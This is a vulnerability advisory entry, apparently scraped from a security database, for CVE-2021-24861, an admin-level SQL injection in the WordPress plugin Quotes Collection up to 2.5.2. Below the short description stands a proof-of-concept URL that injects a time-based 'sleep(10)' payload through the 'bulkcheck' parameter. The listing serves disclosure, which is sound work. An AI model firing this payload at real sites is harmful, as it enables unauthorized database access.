Lucene search
JrXnmWPEX-ID:9A50D5D0-7A50-47D1-A8F9-E0EB217919D9HistoryNov 15, 2021 - 12:00 a.m.
Quotes Collection <= 2.5.2 - Admin+ SQL Injection
2021-11-1500:00:00
JrXnm
135
0.001 Low
EPSS
Percentile
37.7%
The plugin does not validate and escape the bulkcheck parameter before using it in a SQL statement, leading to a SQL injection
https://example.com/wp-admin/admin.php?page=quotes-collection&s=&_wpnonce=6e21e0a8b6&action=make_public&paged=1&bulkcheck[]=1%20and%20sleep(10))--%20-&action2=make_publicRelated
prion
prion
Sql injection
2021-12-13 11:15:00
wpvulndb
wpvulndb
Quotes Collection <= 2.5.2 - Admin+ SQL Injection
2021-11-15 00:00:00
cve
cve
CVE-2021-24861
2021-12-13 11:15:09
patchstack
patchstack
cvelist
cvelist
CVE-2021-24861 Quotes Collection <= 2.5.2 - Admin+ SQL Injection
2021-12-13 10:41:12
cnvd
cnvd
WordPress Quotes Collection plugin SQL injection vulnerability
2021-12-18 00:00:00
nvd
nvd
CVE-2021-24861
2021-12-13 11:15:09